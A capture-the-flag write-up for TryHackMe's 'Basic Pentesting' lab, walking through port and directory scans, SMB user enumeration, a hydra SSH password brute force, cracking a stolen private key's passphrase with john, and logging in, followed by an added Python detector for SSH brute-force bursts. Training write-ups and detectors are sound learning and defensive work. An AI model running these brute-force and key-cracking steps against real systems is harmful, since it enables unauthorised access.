Basic Pentesting
Basic Pentesting, from TryHackMe
Start the target machine; IP: 10.10.227.255
# nmap port scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
# gobuster directory scan
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
Found under /development:
#
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
#
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Following the hint about the tools: how about using SMB to find usernames?
/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
This gives the username jan.
Use hydra to brute-force the SSH password:
hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh
...waited quite a while, roughly ten minutes.
password: armando
Following the hint, run LinEnum; it turns up an SSH private key usable for login:
https://github.com/rebootuser/LinEnum (works out of the box)
/home/kay/.ssh/id_rsa
Use:
ssh2john rsa_a.id_rsa > id_rsa_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt
The cracked passphrase is:
beeswax (very quick)
Log in:
ssh -i id_rsa kay@10.10.227.255
and that's it.
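Defender's view of the hydra step above, as an added example that is not part of the original write-up: a small Python detector that parses sshd "Failed password" lines and flags a source that exceeds a threshold of failures against one user inside a sliding window. The log lines, hostname, source IPs and timestamps are constructed, and the year 2018 is assumed because syslog timestamps carry none.

```python
"""Flag SSH password brute-force bursts in sshd auth log lines.
Added example, not from the original write-up: the hydra step above leaves many
"Failed password" lines for one user from one source within seconds."""
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd auth.log line shape (syslog timestamps carry no year; 2018 is assumed).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)

def parse_line(line):
    """Return (timestamp, result, user, src), or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("2018 " + m["ts"], "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def find_bruteforce(lines, threshold=5, window_s=60):
    """Map (src, user) -> peak number of failed logins inside any window_s-second
    window, for pairs that reached `threshold` (successful logins are ignored)."""
    recent = defaultdict(deque)  # (src, user) -> failure timestamps in window
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[1] != "Failed":
            continue
        ts, _, user, src = parsed
        q = recent[(src, user)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop failures older than the window
        if len(q) >= threshold:
            flagged[(src, user)] = max(flagged.get((src, user), 0), len(q))
    return flagged

# Constructed sample log: hostname, source IPs and timestamps are made up.
SAMPLE_LOG = """\
Apr 23 10:00:01 basic2 sshd[1201]: Failed password for jan from 10.9.1.5 port 41000 ssh2
Apr 23 10:00:01 basic2 sshd[1202]: Failed password for jan from 10.9.1.5 port 41001 ssh2
Apr 23 10:00:02 basic2 sshd[1203]: Failed password for jan from 10.9.1.5 port 41002 ssh2
Apr 23 10:00:02 basic2 sshd[1204]: Failed password for jan from 10.9.1.5 port 41003 ssh2
Apr 23 10:00:03 basic2 sshd[1205]: Failed password for jan from 10.9.1.5 port 41004 ssh2
Apr 23 10:00:04 basic2 sshd[1206]: Accepted password for jan from 10.9.1.5 port 41005 ssh2
Apr 23 10:00:09 basic2 sshd[1210]: Failed password for kay from 10.9.2.7 port 50000 ssh2
""".splitlines()
```

Running `find_bruteforce(SAMPLE_LOG)` on the sample flags only the jan burst from 10.9.1.5; the single kay failure and the accepted login stay below the threshold.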